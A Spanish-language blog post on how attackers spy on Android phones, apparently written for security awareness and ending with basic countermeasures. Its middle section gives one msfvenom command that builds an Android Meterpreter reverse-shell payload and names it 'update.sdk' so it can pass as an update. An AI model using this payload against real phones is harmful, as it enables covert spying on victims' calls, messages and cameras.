Así los hackers utilizan tu celular para espiarte

Luis Enríquez

Así los hackers utilizan tu celular para espiarte

En este post mostraré cómo te pueden espiar por medio de tu teléfono con el sistema Android y cómo protegerte.

En Ecuador se ha puesto muy de moda el tema del espionaje. Varios amigos me han preguntado si es posible que te espíen a través de tu celular, intercepten tus llamadas y mensajes, graben tus conversaciones e incluso te tomen fotos y videos con tu propio teléfono. La respuesta es un rotundo SI.

Los teléfonos inteligentes de hoy son computadores personales. Los sistemas operativos como Android o el iOS del Iphone son presas fáciles. El mayor problema de seguridad de estos radica en que los usuarios no han tomado conciencia aún de lo fácil que es el espionaje a través de ellos.

Cabe resaltar que los programas espías ahora no son solo utilizados por delincuentes informáticos, sino también por gobiernos. Prueba de esto son casos sonados como el espionaje de la National Security Agency (NSA) revelado por Edward Snowden, o el reciente caso de la empresa italiana Hacking Team (HT) revelado por WikiLeaks.


A continuación, muestro lo fácil que es instalar programas de espionaje en móviles con sistema Android a través de la ingeniería social. Lo importante de este post es revisar las medidas para reducir el riesgo de ser espiado. Creamos un payload utilizando Metasploit (puedes descargarlo desde http://www.metasploit.com/). Para ello utilizamos el siguiente comando:
~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.13 LPORT=4444 R > update.sdk

Cotramedidas


1. Descargar aplicaciones solamente desde fuentes conocidas. En el caso de Android, hablamos de PlayStore. Esto reducirá en gran medida el riesgo de descargar malware.

2. Instalar un programa de antivirus en nuestro teléfono.

3. Guardar información confidencial utilizado técnicas de cifrado y steganografía.

4. Si necesitas que tu vida sea ultraconfidencial o si no puedes cumplir con las tres condiciones anteriormente señaladas, tal vez deberías considerar dejar de usar smartphones.